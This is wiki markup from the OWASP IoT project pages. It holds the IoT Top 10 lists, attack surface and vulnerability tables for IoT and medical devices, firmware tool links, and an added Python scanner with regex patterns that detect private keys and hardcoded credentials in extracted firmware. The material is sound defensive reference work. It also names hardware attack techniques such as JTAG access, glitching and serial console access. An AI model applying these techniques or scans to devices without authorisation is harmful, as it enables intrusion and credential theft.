* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and the known vulnerabilities that affect them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Disclosure of authentication/authorization-related values (session key, token, cookie, etc.)<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physically)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable, potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A service can be attacked in a way that denies service to that service or to the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of the firmware on the device and bypass almost all software-based security controls.<br />
* Side-channel attacks can also modify the execution flow or be used to leak sensitive information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, full console access to the device can be obtained<br />
* Security measures usually include custom bootloaders that prevent an attacker from entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Disclosure of authentication/authorization-related values (session key, token, cookie, etc.)<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not hard-code easy-to-guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
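As an added example, not code from the project or from any of the tools linked above, the following Python check walks an extracted firmware root filesystem and flags several of the items in the table: shipped private keys, empty or baked-in passwords in /etc/shadow, the same certificate reused in several places, hardcoded credentials in configuration files and references to deprecated SSL versions. The patterns are constructed heuristics and the sample filesystem is built inline.<br />

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Heuristic patterns for the sensitive-data items in the table above.
# They are constructed for this example and are not exhaustive.
PRIVATE_KEY_RE = re.compile(rb"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----")
CERT_RE = re.compile(rb"-----BEGIN CERTIFICATE-----.*?-----END CERTIFICATE-----", re.S)
HARDCODED_RE = re.compile(rb"(?i)(?:password|passwd|pwd)\s*[=:]\s*['\"]?[^\s'\"]+")
DEPRECATED_SSL_RE = re.compile(rb"(?i)\bSSLv[23]\b")


def scan_shadow(root: Path):
    """Flag /etc/shadow accounts that have an empty password or a baked-in hash."""
    findings = []
    shadow = root / "etc" / "shadow"
    if not shadow.is_file():
        return findings
    for line in shadow.read_text(errors="replace").splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, pw_hash = fields[0], fields[1]
        if pw_hash == "":
            findings.append(("empty-password", f"etc/shadow:{user}"))
        elif pw_hash.startswith("$"):
            # A real hash shipped in the image is a hardcoded credential;
            # '*' or '!' means the account is locked and is left alone.
            findings.append(("hardcoded-hash", f"etc/shadow:{user}"))
    return findings


def scan_files(root: Path):
    """Walk the extracted filesystem for keys, duplicate certs, credentials and SSLv2/v3."""
    findings = []
    certs_seen = {}  # sha256 prefix of a certificate -> first path it was found in
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        data = path.read_bytes()
        if PRIVATE_KEY_RE.search(data):
            findings.append(("private-key", rel))
        for match in CERT_RE.finditer(data):
            digest = hashlib.sha256(match.group(0)).hexdigest()[:16]
            if digest in certs_seen:
                findings.append(("duplicate-cert", f"{rel} == {certs_seen[digest]}"))
            else:
                certs_seen[digest] = rel
        if rel.startswith("etc/") and rel != "etc/shadow" and HARDCODED_RE.search(data):
            findings.append(("hardcoded-credential", rel))
        if DEPRECATED_SSL_RE.search(data):
            findings.append(("deprecated-ssl", rel))
    return findings


def scan_firmware_root(root):
    """Return sorted (finding-kind, location) pairs for an extracted firmware root."""
    root = Path(root)
    return sorted(scan_shadow(root) + scan_files(root))


def build_sample_root():
    """Construct a tiny extracted root filesystem seeded with the issues above."""
    root = Path(tempfile.mkdtemp(prefix="fw-root-"))
    (root / "etc" / "ssl").mkdir(parents=True)
    (root / "usr" / "share").mkdir(parents=True)
    (root / "etc" / "shadow").write_text(
        "root:$1$abc$CONSTRUCTEDHASHVALUE:17000:0:99999:7:::\n"  # hash baked in
        "admin::17000:0:99999:7:::\n"                             # empty password
        "daemon:*:17000:0:99999:7:::\n"                           # locked, fine
    )
    (root / "etc" / "camera.conf").write_text(
        "rtsp_user=admin\nrtsp_password=Admin1234\nssl_protocol=SSLv3\n"
    )
    cert = "-----BEGIN CERTIFICATE-----\nQ09OU1RSVUNURUQgQ0VSVA==\n-----END CERTIFICATE-----\n"
    (root / "etc" / "ssl" / "server.crt").write_text(cert)
    (root / "usr" / "share" / "backup.crt").write_text(cert)  # same cert reused
    (root / "etc" / "ssl" / "server.key").write_text(
        "-----BEGIN RSA PRIVATE KEY-----\nQ09OU1RSVUNURUQgS0VZ\n-----END RSA PRIVATE KEY-----\n"
    )
    return root


if __name__ == "__main__":
    for kind, where in scan_firmware_root(build_sample_root()):
        print(f"{kind:22} {where}")
```

Point `scan_firmware_root` at the directory binwalk or the Firmware Modification Kit extracted to get the same report for a real image.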
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
